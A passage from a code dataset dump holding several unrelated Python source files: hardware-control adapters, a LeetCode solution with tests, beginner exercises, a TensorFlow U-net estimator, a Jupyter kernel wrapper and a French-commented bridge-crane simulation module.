\nprint(\"done\")\n","sub_path":"nTupleAnalysis/scripts/convert_h52h5.py","file_name":"convert_h52h5.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30853599","text":"\"\"\" Adapters for the :py:class:`.hardware_control.API` instances.\n\"\"\"\nimport asyncio\nimport copy\nimport functools\nimport threading\nfrom typing import List, Mapping\n\nfrom . import API\nfrom .types import Axis, HardwareAPILike\n\n\nclass SynchronousAdapter(HardwareAPILike, threading.Thread):\n \"\"\" A wrapper to make every call into :py:class:`.hardware_control.API`\n synchronous.\n\n Example\n -------\n .. code-block::\n >>> import opentrons.hardware_control as hc\n >>> import opentrons.hardware_control.adapters as adapts\n >>> api = hc.API.build_hardware_simulator()\n >>> synch = adapts.SynchronousAdapter(api)\n >>> synch.home()\n \"\"\"\n\n @classmethod\n def build(cls, builder, *args, build_loop=None, **kwargs):\n \"\"\" Build a hardware control API and initialize the adapter in one call\n\n :param builder: the builder method to use (e.g.\n :py:meth:`hardware_control.API.build_hardware_simulator`)\n :param args: Args to forward to the builder method\n :param kwargs: Kwargs to forward to the builder method\n \"\"\"\n loop = asyncio.new_event_loop()\n kwargs['loop'] = loop\n args = [arg for arg in args\n if not isinstance(arg, asyncio.AbstractEventLoop)]\n if asyncio.iscoroutinefunction(builder):\n checked_loop = build_loop or asyncio.get_event_loop()\n api = checked_loop.run_until_complete(builder(*args, **kwargs))\n else:\n api = builder(*args, **kwargs)\n return cls(api, loop)\n\n def __init__(self,\n api: API,\n loop: asyncio.AbstractEventLoop = None) -> None:\n \"\"\" Build the SynchronousAdapter.\n\n :param api: The API instance to wrap\n :param loop: A specific event loop to use. This is for the use of\n :py:meth:`build` and should normally not be used; since\n this loop will be run in a worker thread it should not\n be run elsewhere. If not specified (which should be the\n normal use case) the adapter will start a new event loop\n for the worker thread.\n \"\"\"\n checked_loop = loop or asyncio.new_event_loop()\n api.set_loop(checked_loop)\n self._loop = checked_loop\n self._api = api\n self._call_lock = threading.Lock()\n self._cached_sync_mods: Mapping[str, SynchronousAdapter] = {}\n super().__init__(\n target=self._event_loop_in_thread,\n name='SynchAdapter thread for {}'.format(repr(api)))\n super().start()\n\n def __repr__(self):\n return ''\n\n def _event_loop_in_thread(self):\n loop = object.__getattribute__(self, '_loop')\n loop.run_forever()\n loop.close()\n\n def join(self):\n thread_loop = object.__getattribute__(self, '_loop')\n if thread_loop.is_running():\n thread_loop.call_soon_threadsafe(lambda: thread_loop.stop())\n super().join()\n\n def __del__(self):\n try:\n thread_loop = object.__getattribute__(self, '_loop')\n except AttributeError:\n pass\n else:\n if thread_loop.is_running():\n thread_loop.call_soon_threadsafe(lambda: thread_loop.stop())\n\n def discover_modules(self):\n loop = object.__getattribute__(self, '_loop')\n api = object.__getattribute__(self, '_api')\n discovered_mods = self.call_coroutine_sync(loop, api.discover_modules)\n async_mods = {mod.port: mod for mod in discovered_mods}\n\n these = set(async_mods.keys())\n known = set(self._cached_sync_mods.keys())\n new = these - known\n gone = known - these\n\n for mod_port in gone:\n self._cached_sync_mods.pop(mod_port)\n for mod_port in new:\n self._cached_sync_mods[mod_port] \\\n = SynchronousAdapter(async_mods[mod_port])\n\n return list(self._cached_sync_mods.values())\n\n @staticmethod\n def call_coroutine_sync(loop, to_call, *args, **kwargs):\n fut = asyncio.run_coroutine_threadsafe(to_call(*args, **kwargs), loop)\n return fut.result()\n\n def __getattribute__(self, attr_name):\n \"\"\" Retrieve attributes from our API and wrap coroutines \"\"\"\n # Almost every attribute retrieved from us will be fore people actually\n # looking for an attribute of the hardware API, so check there first.\n if attr_name == 'discover_modules':\n return object.__getattribute__(self, attr_name)\n\n api = object.__getattribute__(self, '_api')\n try:\n attr = getattr(api, attr_name)\n except AttributeError:\n # Maybe this actually was for us? Let’s find it\n return object.__getattribute__(self, attr_name)\n\n try:\n check = attr.__wrapped__\n except AttributeError:\n check = attr\n loop = object.__getattribute__(self, '_loop')\n if asyncio.iscoroutinefunction(check):\n # Return a synchronized version of the coroutine\n return functools.partial(self.call_coroutine_sync, loop, attr)\n elif asyncio.iscoroutine(check):\n # Catch awaitable properties and reify the future before returning\n fut = asyncio.run_coroutine_threadsafe(check, loop)\n return fut.result()\n\n return attr\n\n\nclass SingletonAdapter(HardwareAPILike):\n \"\"\" A wrapper to use as a global singleton to control hardware.\n\n This wrapper adds some useful utility functions to defer initialization\n of true hardware controllers (to cut down on work at module import time)\n and in general ease the transition away from the direct use of the old\n robot singleton.\n\n When the :py:class:`SingletonAdapter` is initialized, it will make a\n hardware simulator instance. When :py:meth:`connect` is called, this\n simulator will be replaced with a new controller that connects to the\n hardware with the specified arguments.\n\n Attribute accesses are passed on to the embedded\n :py:class:`.hardware_control.API`.\n \"\"\"\n\n def __init__(self, loop: asyncio.AbstractEventLoop = None) -> None:\n self._api = API.build_hardware_simulator(loop=loop)\n\n def __getattr__(self, attr_name):\n return getattr(self._api, attr_name)\n\n def connect(self, port: str = None):\n \"\"\" Connect to hardware.\n\n :param port: The port to connect to. May be `None`, in which case the\n hardware will connect to the first serial port it sees\n with the device name `FT232R`; or port name compatible\n with `serial.Serial`_. # noqa(E501)\n \"\"\"\n old_api = object.__getattribute__(self, '_api')\n loop = old_api._loop\n config = loop.run_until_complete(old_api.config)\n new_api = loop.run_until_complete(API.build_hardware_controller(\n loop=loop,\n port=port,\n config=copy.copy(config)))\n old_api._loop.run_until_complete(new_api.cache_instruments())\n setattr(self, '_api', new_api)\n\n def disconnect(self):\n \"\"\" Disconnect from connected hardware. \"\"\"\n old_api = object.__getattribute__(self, '_api')\n config = old_api._loop.run_until_complete(old_api.config)\n new_api = API.build_hardware_simulator(\n loop=old_api._loop,\n config=copy.copy(config))\n setattr(self, '_api', new_api)\n\n def is_connected(self):\n \"\"\" `True` if connected (e.g. has a real controller backing it). \"\"\"\n api = object.__getattribute__(self, '_api')\n return api.is_simulator_sync\n\n async def disengage_axes(self, which: List[str]):\n api = object.__getattribute__(self, '_api')\n await api.disengage_axes([Axis[ax.upper()] for ax in which])\n\n async def get_attached_pipettes(self):\n \"\"\" Mimic the behavior of robot.get_attached_pipettes\"\"\"\n api = object.__getattribute__(self, '_api')\n instrs = {}\n attached = await api.attached_instruments\n for mount, data in attached.items():\n instrs[mount.name.lower()] = {\n 'model': data.get('model', None),\n 'name': data.get('name', None),\n 'id': data.get('pipette_id', None),\n 'mount_axis': Axis.by_mount(mount),\n 'plunger_axis': Axis.of_plunger(mount)\n }\n if data.get('model'):\n instrs[mount.name.lower()]['tip_length'] \\\n = data.get('tip_length', None)\n\n return instrs\n","sub_path":"api/src/opentrons/hardware_control/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":8704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255633964","text":"import unittest\n\n\nclass Solution(object):\n def solve(self, matrix):\n if matrix is None or len(matrix) < 1:\n return 0\n\n length, width = len(matrix), len(matrix[0])\n left, right = [0] * width, [width] * width\n height = [0] * width\n result = 0\n\n for i in range(length):\n curr_left, curr_right = 0, width\n\n # calculate left boundary\n for j in range(width):\n if matrix[i][j] == '1':\n left[j] = max(left[j], curr_left)\n else:\n left[j] = 0\n curr_left = j + 1\n\n # calculate right boundary\n for j in reversed(range(width)):\n if matrix[i][j] == '1':\n right[j] = min(right[j], curr_right)\n else:\n right[j] = width\n curr_right = j\n\n # calculate height\n for j in range(width):\n if matrix[i][j] == '1':\n height[j] += 1\n else:\n height[j] = 0\n\n area = [(right[k] - left[k]) * height[k] for k in range(width)]\n result = max(result, max(area))\n return result\n\n\nclass SolutionTestCase(unittest.TestCase):\n def test_example(self):\n m = ['11001',\n '01001',\n '00111',\n '00111',\n '00001']\n self.assertEqual(Solution().solve(m), 6)\n\n def test_first(self):\n m = ['10100',\n '10111',\n '11111',\n '10010']\n self.assertEqual(Solution().solve(m), 6)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"leetcode/85.max_rectangle.py","file_name":"85.max_rectangle.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"391539913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef product(x, y=1, *numbers):\n sum = x * y\n for i in numbers:\n sum = sum * i\n return sum\n\n\n# print(product(1, 2, 3))\n\n\ndef fact(n):\n if n == 1:\n return 1\n return n * fact(n - 1)\n\n\n# print(fact(1000))\n\n\ndef fact_iter(num, product):\n if num == 1:\n return product\n return fact_iter(num - 1, num * product)\n\n\n# print(fact_iter(1000, 1))\n\n# 汉诺塔的移动\n# 阶段一: 将前(n-1)个盘子从 A 经过C 移到 B\n# 阶段二: 将第n个最大的盘子从 A 经过B 移到 C(n=1)\n# 阶段三: 将(n-1)个盘子从 B 经过A 移到 C\n\n\ndef move(n, a, b, c):\n if n == 1:\n print(a, ' --> ', c)\n else:\n move(n - 1, a, c, b)\n move(1, a, b, c)\n move(n - 1, b, a, c)\n\n return None\n\n\n# move(3, 'A', 'B', 'C')\n\nL = ['Michael', 'Sarah', 'Tracy', 'Bob', 'Jack']\nr = []\nn = 3\nfor i in range(3):\n r.append(L[i])\n\n# print(r)\n\n# 去除字符串头尾空格\n\n\ndef trim(s):\n if s[:1] == ' ':\n return trim(s[1:])\n elif s[-1:] == ' ':\n return trim(s[:-1])\n else:\n return s\n\n\n# print(trim(' hello '))\n'''\n if trim('hello ') != 'hello':\n print('测试失败!')\n elif trim(' hello') != 'hello':\n print('测试失败!')\n elif trim(' hello ') != 'hello':\n print('测试失败!')\n elif trim('') != '':\n print('测试失败!')\n elif trim(' ') != '':\n print('测试失败!')\n else:\n print('测试成功!')\n\n for i, value in enumerate(['A', 'B', 'C']):\n print(i, value)\n\n '''\n\n\ndef findMinAndMax(L):\n if len(L) == 0:\n min = None\n max = None\n else:\n min = L[0]\n max = L[0]\n for i in L:\n if min > i:\n min = i\n if max < i:\n max = i\n return min, max\n\n\n'''\nif findMinAndMax([]) != (None, None):\n print(findMinAndMax([]))\n print('Flase')\nelif findMinAndMax([7]) != (7, 7):\n print(findMinAndMax([7]))\n print('Flase')\nelif findMinAndMax([7, 1]) != (1, 7):\n print(findMinAndMax([7, 1]))\n print('Flase')\nelif findMinAndMax([7, 1, 3, 9, 5]) != (1, 9):\n print(findMinAndMax([7, 1, 3, 9, 5]))\n print('Flase!')\nelse:\n print('True!')\n '''\n\nL1 = ['Hello', 'World', 18, 'Apple', None]\n\nL2 = [s.lower() for s in L1 if isinstance(s, str)]\n\n# print(L2)\n\n\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\n# fib(6)\n\n\ndef fgb(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield (b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\n# g = fgb(6)\n# for n in g:\n# print(n)\n\n\ndef triangles():\n L = [1]\n while True:\n yield L\n # yield L[:]\n # yield list(L)\n L.append(0)\n L = [L[x - 1] + L[x] for x in range(len(L))]\n\n\ndef triangle():\n L = [1]\n while True:\n yield L\n L = [1] + [L[x - 1] + L[x] for x in range(1, len(L - 2))] + [1]\n\n\n'''\n杨辉三角 生成器generator\n这句话有问题\n因为L作为List是可变的。注意测试的代码,相当于result.append(L),在函数里面每改变一次L,result里面的元素也会跟着变。\n而List(L)相当于生成一个新的列表进行返回,你后面对L的改变都不会影响到以前加进去的元素。\n\nn = 0\nresults = []\nfor t in triangles():\n # print(t)\n for i in t:\n print('%5d' % (i), end='')\n print()\n results.append(t)\n n = n + 1\n if n == 10:\n break\n'''\n","sub_path":"Learn/Python/Python_learn/0_Introduction/0.test.py","file_name":"0.test.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"438437977","text":"\"\"\" Demonstration how create and use tf.estimator.Estimator with U-net\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.nn import sigmoid\nfrom idog.detection.unet import make_unet, get_loss, IOU\n\n\ndef create_summary(data):\n \"\"\"\n Create summary for the model\n\n :param data: dict: two required keys - scalar and image, values -\n lists of tuple with display name and elements of tf.graph\n :return:\n \"\"\"\n for i in data[\"scalar\"]:\n tf.summary.scalar(i[0], i[1])\n for i in data[\"image\"]:\n tf.summary.image(i[0], i[1])\n\n\ndef make_unet_estimator(features, labels, mode, params):\n \"\"\"\n Creation of tf.estimator.Estimator for U-net\n\n :param features: tf.Tensor: images\n :param labels: tf.Tensor: masks\n :param mode: tf.estimator.ModeKeys\n :param params: dict: params of the model\n :return: tf.estimator.EstimatorSpec\n \"\"\"\n orig_images = features\n true_masks = labels\n net = make_unet(orig_images, num_filters=params[\"num_filters\"], num_blocks=params[\"num_blocks\"],\n batch_normalization=params[\"batch_normalization\"], training=params[\"training\"])\n predictions = {\n \"predicted_soft_masks\": sigmoid(net),\n \"predicted_masks\": tf.round(sigmoid(net))\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode, predictions)\n\n loss = get_loss(net, true_masks, lam=params[\"IOU_weight\"])\n\n if params[\"create_summary\"]:\n data = {\n \"scalar\": [(\"Loss\", loss), (\"IOU\", IOU(net, true_masks))],\n \"image\": [(\"Predicted_masks\", sigmoid(net)), (\"Original_images\", orig_images),\n (\"Original_masks\", true_masks)]\n }\n create_summary(data)\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n global_step = tf.train.get_or_create_global_step()\n learning_rate = tf.train.exponential_decay(params[\"learning_rate\"], global_step,\n params[\"lr_decay_steps\"], params[\"lr_decay_rate\"], staircase=True)\n\n optim = tf.train.AdamOptimizer(learning_rate=learning_rate)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optim.minimize(loss, global_step=global_step)\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n\n eval_metric_ops = {\"IOU\": tf.metrics.mean(IOU(net, labels))}\n\n return tf.estimator.EstimatorSpec(mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\ndef random_image_generator():\n \"\"\"\n Generates simple data for the model\n\n :return: tuple of nd.array: image and mask\n \"\"\"\n random_img = np.random.random((1000, 32, 32, 1)).astype(np.float32)\n predicted_img = (random_img > 0.9).astype(int).astype(np.float32)\n for img, mask in zip(random_img, predicted_img):\n yield img, mask\n\n\ndef input_evaluation_set():\n \"\"\"\n Gives simple numpy dataset for the problem\n\n :return: tuple of nd.array: images and masks\n \"\"\"\n random_img = np.random.random((1000, 32, 32, 1)).astype(np.float32)\n predicted_img = (random_img > 0.9).astype(int).astype(np.float32)\n return random_img, predicted_img\n\n\ndef input_fn_from_generator():\n \"\"\"\n Creates example of tf.data.Dataset from generator\n\n :return: tf.data.Dataset\n \"\"\"\n tr_data = tf.data.Dataset.from_generator(random_image_generator, (tf.float32, tf.float32),\n (tf.TensorShape([32, 32, 1]), tf.TensorShape([32, 32, 1]))).batch(5)\n return tr_data\n\n\nif __name__ == \"__main__\":\n\n params = {\n \"num_blocks\": 4,\n \"num_filters\": 8,\n \"IOU_weight\": 0.1,\n \"learning_rate\": 0.001,\n \"lr_decay_steps\": 1000,\n \"lr_decay_rate\": 0.96,\n \"training\": None,\n \"batch_normalization\": False,\n \"create_summary\": True\n }\n tf.logging.set_verbosity(tf.logging.INFO)\n imgs, masks = input_evaluation_set()\n segmentator = tf.estimator.Estimator(model_fn=make_unet_estimator, model_dir=\"../../data/model\", params=params)\n input_fn_from_numpy = tf.estimator.inputs.numpy_input_fn(x=imgs, y=masks, batch_size=10, num_epochs=10,\n shuffle=False)\n segmentator.train(input_fn=input_fn_from_generator)\n segmentator.train(input_fn=input_fn_from_numpy)\n","sub_path":"idog_original/idog/detection/unet_estimator.py","file_name":"unet_estimator.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"592487150","text":"import torch\nimport numpy as np\n\nclass Pipeline():\n def __init__(self, encoder, model, device):\n self.encoder = encoder\n self.model = model\n self.device = device\n\n # Input: x = images as list of numpy arrays\n # Output: y = pose as 6D representation\n def process(self, images):\n # Disable gradients for the encoder\n with torch.no_grad():\n # Convert images to AE codes\n codes = []\n for img in images:\n # Normalize image\n img_max = np.max(img)\n img_min = np.min(img)\n img = (img - img_min)/(img_max - img_min)\n\n # Run image through encoder\n img = torch.from_numpy(img).unsqueeze(0).permute(0,3,1,2).to(self.device)\n #print(img.shape)\n code = self.encoder(img.float())\n code = code.detach().cpu().numpy()[0]\n norm_code = code / np.linalg.norm(code)\n codes.append(norm_code)\n\n # Predict poses from the codes\n batch_codes = torch.tensor(np.stack(codes), device=self.device, dtype=torch.float32)\n predicted_poses = self.model(batch_codes)\n return predicted_poses\n","sub_path":"pytorch3d/Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"19297345","text":"# Copyright (c) Stanford University, The Regents of the University of\n# California, and others.\n#\n# All Rights Reserved.\n#\n# See Copyright-SimVascular.txt for additional details.\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject\n# to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER\n# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom ipykernel.kernelbase import Kernel\n\nfrom os import unlink, environ\n\nimport base64\nimport imghdr\nimport re\nimport signal\nimport urllib\n\n# added by me to try and add version number\nfrom subprocess import check_output\n\nfrom simvascular_python_kernel import subprocess_repl, simvascular_python_proxy\n\n__version__ = '1.0.0'\n\nversion_pat = re.compile(r'version (\\d+(\\.\\d+)+)')\n\nclass SimVascularPythonKernel(Kernel):\n implementation = 'simvascular_python_kernel'\n implementation_version = __version__\n\n @property\n def language_version(self):\n m = version_pat.search(self.banner)\n return m.group(1)\n\n _banner = None\n\n @property\n def banner(self):\n if self._banner is None:\n self._banner = \"SimVascular Version REPLACE_SV_TIMESTAMP\"\n return self._banner\n\n language_info = {'name': 'simvascular_python',\n 'codemirror_mode': 'shell',\n 'mimetype': 'text/x-sh',\n 'file_extension': '.py'}\n\n def __init__(self, **kwargs):\n Kernel.__init__(self, **kwargs)\n repl = subprocess_repl.SubprocessRepl(['C:\\\\Program Files\\\\SimVascular\\\\SimVascular\\\\REPLACE_SV_TIMESTAMP\\\\sv.bat', '-python', '--', '-i'])\n self.proxy = simvascular_python_proxy.ReplProxy(repl)\n\n def do_execute(self, code, silent, store_history=True,\n user_expressions=None, allow_stdin=False):\n if not code.strip():\n return {'status': 'ok', 'execution_count': self.execution_count,\n 'payload': [], 'user_expressions': {}}\n \n self.proxy.send_input(code)\n output = self.proxy.get_output()\n\n message = {'name': 'stdout', 'text': output}\n self.send_response(self.iopub_socket, 'stream', message)\n\n return {'status': 'ok', 'execution_count': self.execution_count,\n 'payload': [], 'user_expressions': {}}\n","sub_path":"BuildWithMake/Release/Jupyter/windows/site-packages/simvascular_python_kernel/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"171196826","text":"\"\"\"\nComposants et systèmes reliés aux ponts.\n----------------------------------------\n\nLe concept de :class:`Pont` est un composant associé à un :class:`cyme.simulation.graphe.Noeud`, capable de se déplacer sur un graphe représentant des cuves. Le behavior tree ci-dessous montre l'IA de la machine. Essentiellement, on boucle sur les étapes:\n\n * si le pont est utilisable (c'est-à-dire dans un état où il n'est pas brisé)\n * si l'opérateur n'est pas en pause\n * si le pont doit participer à un \"move prioritaire\", par exemple un transbordement qui nécessite le déplacement de plusiers ponts.\n * si le pont est positionné par dessus la bonne cuve (Kanban.get_current_target())\n * laisser passer un temps de réalisation (Delay) pour la tâche en cours (Kanban)\n\nAvec le système gestionnaire_pont, les ponts permettent de représenter la majorité des opérations qui sont exécutées dans un centre d'électrolyse.\n\n.. image:: images/bt_pont.png\n :align: center\n\nAfin de garder le behavior tree le plus réactif possible l'exéction d'un Kanban est fait d'une manière non-atomique.\nLe Kanban en cours peut être mis en pause ou annulé par le système gestionnaire_pont si on le pont est nécessaire à une tâche plus importante, par exemple un transbordement.\nLe pont devra exécuter le même Kanban tant que le booléen \"completed\" n'est pas vrai.\n\n\n\"\"\"\n\nfrom collections import deque\n\nfrom kivy.core.text import Label as CoreLabel\nfrom kivy.graphics.context_instructions import Color, PushMatrix, PopMatrix, Rotate, Translate\nfrom kivy.graphics.vertex_instructions import Rectangle, Line\n\nfrom .. import ecs\nfrom .. import bt\n\nfrom . import bt_pont\nfrom .. import simulation\n\n\nclass Pont(ecs.Component):\n MSE, PACD, MTC = range(3)\n\n def __init__(self, nom, index, mobile=None, entity_manager=None, noeud_entrepot=None):\n self.nom = nom\n self.root = None\n self.mobile = mobile\n self.nature = Pont.MSE\n self.secteur = None\n\n self.kanbans = deque([])\n self.kanbans_lock = False\n self.is_operation = False\n self.bris = deque([])\n self.is_bris = False\n self.pauses = deque([])\n self.is_pause = False\n self.rdc = deque([])\n self.is_rdc = False\n\n self.entity_manager = entity_manager\n self.noeud_entrepot = noeud_entrepot\n self.gestionnaire_pont = None\n\n self.setup_behavior()\n\n def set_gestionnaire_pont(self, gestionnaire):\n self.gestionnaire_pont = gestionnaire\n\n def setup_behavior(self):\n \"\"\" Setup du behavior tree pour le traitements des files de kanbans\n C'est ici qu'on fait les ajustements nécessaires pour les arbres bris, pauses et kanbans\n Notamment on ajoute le noeud déplacement du mobile en pretache pour le bt kanbans\n \"\"\"\n self.root = bt.Selector()\n\n parallel_bris_pauses = bt.Parallel()\n self.root.add_child(parallel_bris_pauses)\n\n bris = self.setup_behavior_kanban(\"bris\")\n pauses = self.setup_behavior_kanban(\"pauses\")\n parallel_bris_pauses.add_child(bris)\n parallel_bris_pauses.add_child(pauses)\n\n parallel_kanbans_rdc = bt.Parallel()\n self.root.add_child(parallel_kanbans_rdc)\n\n inverter = bt.Inverter()\n inverter.add_child(bt_pont.IsLocked(self))\n\n kanbans = self.setup_behavior_kanban(\"kanbans\", preconditions=[inverter], pretaches=[bt_pont.MoveToTarget(self, \"kanbans\")])\n parallel_kanbans_rdc.add_child(kanbans)\n\n rdc = self.setup_behavior_kanban(\"rdc\", pretaches=[bt_pont.MoveToTarget(self, \"rdc\")])\n parallel_kanbans_rdc.add_child(rdc)\n\n\n def setup_behavior_kanban(self, queue, preconditions=list(), pretaches=list(), postconditions=list(), posttaches=list()):\n \"\"\" Setup du behavior tree de base pour le traitement des files de kanban\n L'argument queue est le nom de la file qui doit être affectée par le bt, soit kanbans, pauses ou bris.\n Les arguments preconditions, pretaches, postconditions et posttaches permettent de\n d'ajouter des comportements supplémentaires aux principaux composants de l'arbre.\n \"\"\"\n root = bt.SequenceStar()\n inverter = bt.Inverter()\n inverter.add_child(bt_pont.IsQueueEmpty(self, queue))\n root.add_child(inverter)\n\n root.add_child(bt_pont.Precondition(self, queue))\n for precondition in preconditions:\n root.add_child(precondition)\n\n root.add_child(bt_pont.Pretache(self, queue))\n for pretache in pretaches:\n root.add_child(pretache)\n\n root.add_child(bt_pont.Tache(self, queue))\n\n root.add_child(bt_pont.Postcondition(self, queue))\n for postcondition in postconditions:\n root.add_child(postcondition)\n\n root.add_child(bt_pont.Posttache(self, queue))\n for posttache in posttaches:\n root.add_child(posttache)\n return root\n\n def __repr__(self):\n return \"{0}\".format(self.nom)\n\n def update(self):\n \"\"\"Update du bb et du bt.\"\"\"\n self.root.run()\n\n\nclass RenderPont(ecs.System):\n \"\"\"Systeme pour le rendering des ponts.\"\"\"\n\n\n\n def __init__(self, canvas, couleurs, textures):\n super().__init__()\n self.canvas = canvas\n self.couleurs = couleurs\n self.textures = textures\n self.cadran = None\n\n def init(self):\n pass\n\n def reset(self):\n pass\n\n def set_cadran(self):\n # Pour reference seulement\n # On split l'écran en 4 cadrans\n # index, position, size\n # BG = (0, (0,0),(550,350))\n # BD = (1, (550,0),(550,350))\n # HG = (2, (0,350),(550,350))\n # HD = (3, (550,350),(550,350))\n self.cadran = [[], [], [], []]\n for entity, pont in self.entity_manager.pairs_for_type(Pont):\n x = pont.mobile.noeud.box.pos[0]\n y = pont.mobile.noeud.box.pos[1]\n if y < 350:\n if x < 550:\n self.cadran[0].append(pont)\n pont.cadran = 0\n pont.position_label = 0\n else:\n self.cadran[1].append(pont)\n pont.cadran = 1\n pont.position_label = 0\n else:\n if x < 550:\n self.cadran[2].append(pont)\n pont.cadran = 2\n pont.position_label = 0\n else:\n self.cadran[3].append(pont)\n pont.cadran = 3\n pont.position_label = 0\n\n def set_postion_label(self):\n for cadran in self.cadran:\n if len(cadran) > 1:\n for i, pont in enumerate(cadran):\n if i == 0:\n continue\n pont.position_label += i * 30\n\n def draw_text(self, text, font_size, x, y):\n label = CoreLabel(text=\"{0}\".format(text), font_size=font_size)\n label.refresh()\n texture = label.texture\n Rectangle(size=texture.size, pos=(x,y), texture=texture)\n\n def draw_text_with_rotation(self, text, font_size, x, y, angle):\n PushMatrix()\n label = CoreLabel(text=\"{0}\".format(text), font_size=font_size)\n label.refresh()\n texture = label.texture\n Translate(x, y)\n Rotate(angle, 0, 0, 1)\n Rectangle(size=texture.size, pos=(0, 0), texture=texture)\n PopMatrix()\n\n def temps_total_completion(self, pont):\n t = 0\n for k in pont.kanbans:\n t += k.operation.get_duree(pont)\n return t\n\n def update(self, dt):\n #self.set_cadran()\n #self.set_postion_label()\n with self.canvas.after:\n label_pont_x, label_pont_y = (40,25)\n for entity, pont in self.entity_manager.pairs_for_type(Pont):\n box = pont.mobile.noeud.box\n Color(box.color[0], box.color[1], box.color[2], box.alpha)\n Rectangle(pos=box.pos, size=box.size)\n Color(box.contour_color[0], box.contour_color[1], box.contour_color[2], box.alpha)\n Line(rectangle=box.pos + (12, 36))\n self.draw_text(pont.nom, 14, box.pos[0], box.pos[1] + 40)\n\n for entity, pont in self.entity_manager.pairs_for_type(Pont):\n PopMatrix()\n self.draw_text(pont.nom, 14, label_pont_x - 30, label_pont_y)\n queue_names = [\"kanbans\", \"pauses\", \"bris\", \"rdc\"]\n x, y = label_pont_x, label_pont_y\n for queue_name in queue_names:\n x = label_pont_x\n queue = getattr(pont, queue_name)\n old_name = \"\"\n if queue:\n Color(0,0,0,1)\n t = queue[0].temps_restant\n seconde = t % 3600\n minute = seconde // 60\n seconde = seconde % 60\n self.draw_text(\"[{0:02d}m{1:02d}s]\".format(minute, seconde), 12, x-10, y)\n if queue_name == \"kanbans\":\n t = self.temps_total_completion(pont)\n heure = t // 3600\n seconde = t % 3600\n minute = seconde // 60\n seconde = seconde % 60\n self.draw_text(\"[{0:02d}h{1:02d}m{2:02d}s]\".format(heure, minute, seconde), 12, x - 10, y-20)\n for i, kanban in enumerate(queue):\n kanban_position_x = 50\n if i < 79:\n color = kanban.operation.get_color()\n Color(color[0], color[1], color[2], 1)\n Rectangle(pos=(x+kanban_position_x,y), size=(16,16))\n if isinstance(kanban, simulation.kanban.Kanban):\n Color(0,0,0,1)\n self.draw_text(\"{0:02d}\".format(kanban.debut+1), 11, x+kanban_position_x+2, y)\n elif isinstance(kanban, simulation.kanban.DelayedKanban):\n Color(0,0,0,1)\n self.draw_text(\"{0:02d}\".format(kanban.duree//60), 11, x+kanban_position_x+2, y)\n elif isinstance(kanban, simulation.kanban.DeltaKanban):\n Color(0,0,0,1)\n self.draw_text(\"{0:02d}\".format(kanban.debut+1), 11, x+kanban_position_x+2, y)\n if kanban.operation.name != old_name:\n Color(0,0,0,1)\n self.draw_text_with_rotation(kanban.operation.name, 12, x+kanban_position_x, y+5, 45)\n old_name = kanban.operation.name\n else:\n Color(0, 0, 0, 1)\n self.draw_text(\"...\",14,x+kanban_position_x, y)\n break\n x += 20\n y += 30\n label_pont_y += 100\n PushMatrix()\n","sub_path":"electrolyse/pont.py","file_name":"pont.py","file_ext":"py","file_size_in_byte":11327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522622268","text":"import lazyboy\nimport time\nimport logging\nfrom lazyboy.key import Key\nfrom django.conf import settings\nfrom 